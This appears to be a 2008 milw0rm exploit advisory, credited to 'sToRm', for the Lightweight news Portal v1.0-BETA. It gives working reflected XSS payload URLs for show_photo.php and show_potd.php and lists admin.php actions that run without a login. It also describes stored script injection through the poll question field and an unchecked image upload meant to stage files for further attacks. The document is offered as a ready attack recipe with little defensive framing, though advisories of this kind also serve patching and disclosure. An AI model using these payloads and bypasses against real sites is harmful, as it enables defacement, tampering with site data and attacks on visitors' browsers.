53 lines
No EOL
1.6 KiB
Text
53 lines
No EOL
1.6 KiB
Text
____ _ _ _ ___ __ _ __
|
|
/ ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _
|
|
| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
|
|
| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| |
|
|
\____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, |
|
|
---------------------------------------------------------------------------|___/
|
|
Exploit found by sToRm
|
|
|
|
|
|
LNP: Lightweight news Portal v1.0-BETA
|
|
Multiple Remote Vulnerabilities
|
|
|
|
|
|
Cross-Site Scripting
|
|
--------------------
|
|
|
|
show_photo.php?photo="><script>javascript:alert(document.domain)</script>
|
|
show_potd.php?potd="><script>javascript:alert(document.domain)</script>
|
|
|
|
|
|
Insecure Administration
|
|
-----------------------
|
|
|
|
The admin page faces us with a login, but many important functions are allowed
|
|
to be executed without a logged-in session.
|
|
|
|
admin.php?A=potd_delete
|
|
admin.php?A=potd
|
|
admin.php?A=vote_update
|
|
admin.php?A=vote
|
|
admin.php?A=modifynews
|
|
|
|
|
|
Permanent Code Injection
|
|
------------------------
|
|
|
|
admin.php?A=vote
|
|
|
|
"Current question" field allows for code injection, allowing us to force
|
|
all users browsing the poll to view an XSS or browser exploit.
|
|
|
|
|
|
File Upload
|
|
-----------
|
|
|
|
admin.php?A=potd
|
|
|
|
The "picture of the day" manager allows for further images to be
|
|
uploaded, but does not check for image validity. Although a phpshell
|
|
cannot be executed through this method, a source may be uploaded for
|
|
inclusion in further attacks, possibly an LFI somewhere on the server.
|
|
|
|
# milw0rm.com [2008-06-20] |